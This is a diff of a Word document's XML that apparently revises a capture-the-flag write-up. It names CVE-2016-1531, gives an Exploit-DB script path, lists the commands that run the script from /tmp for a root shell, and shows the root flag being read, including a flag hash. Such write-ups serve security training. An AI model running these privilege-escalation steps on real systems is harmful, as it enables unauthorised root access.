-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
+        <w:t>CVE-2016-1531</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7849,8 +8092,6 @@
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
           <w:kern w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
@@ -7858,59 +8099,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>su root</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Successfully escalated privileges.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Verification:</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7935,8 +8123,6 @@
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
           <w:kern w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
@@ -7946,36 +8132,43 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>whoami</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Output:</w:t>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11639E21" wp14:editId="768700C5">
+            <wp:extent cx="5731510" cy="1562100"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="916211593" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="916211593" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1562100"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -8001,27 +8194,27 @@
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>root</w:t>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Exploit Analysis</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8036,106 +8229,12 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D541F0A" wp14:editId="1144121B">
-            <wp:extent cx="5731510" cy="2529840"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
-            <wp:docPr id="680771445" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="680771445" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2529840"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Retrieving Root Flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Navigate to root directory:</w:t>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Located exploit:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8181,29 +8280,83 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>cd /root</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>ls</w:t>
+        <w:t>/usr/share/exploitdb/exploits/linux/local/39535.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="671A958B" wp14:editId="01E7F3C1">
+            <wp:extent cx="5076190" cy="4761905"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="1117399941" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1117399941" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5076190" cy="4761905"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -8211,11 +8364,36 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Found file:</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Privilege Escalation (Root)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Steps:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8261,7 +8439,91 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>proof.txt</w:t>
+        <w:t>cd /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>vi exploit.sh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>chmod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> +x exploit.sh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>./exploit.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8281,7 +8543,110 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Command:</w:t>
+        <w:t>Successfully gained root shell.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1434089F" wp14:editId="6BDEEBAC">
+            <wp:extent cx="5731510" cy="1471295"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="776170281" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="776170281" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1471295"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Root Flag Capture</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Commands:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8327,7 +8692,35 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>cat proof.txt</w:t>
+        <w:t>cd /root</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>ls</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>cat flag.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8347,7 +8740,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Root flag:</w:t>
+        <w:t>Output:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8393,12 +8786,23 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>ab28c8ca8da1b9ffc2d702ac54221105</w:t>
+        <w:t>Congratulations you found the flag</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="0"/>
@@ -8410,12 +8814,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77321CAB" wp14:editId="5882CD25">
-            <wp:extent cx="5361905" cy="3257143"/>
-            <wp:effectExtent l="0" t="0" r="0" b="635"/>
-            <wp:docPr id="75862612" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="395CEAA1" wp14:editId="3CA1EF11">
+            <wp:extent cx="4323809" cy="4980952"/>
+            <wp:effectExtent l="0" t="0" r="635" b="0"/>
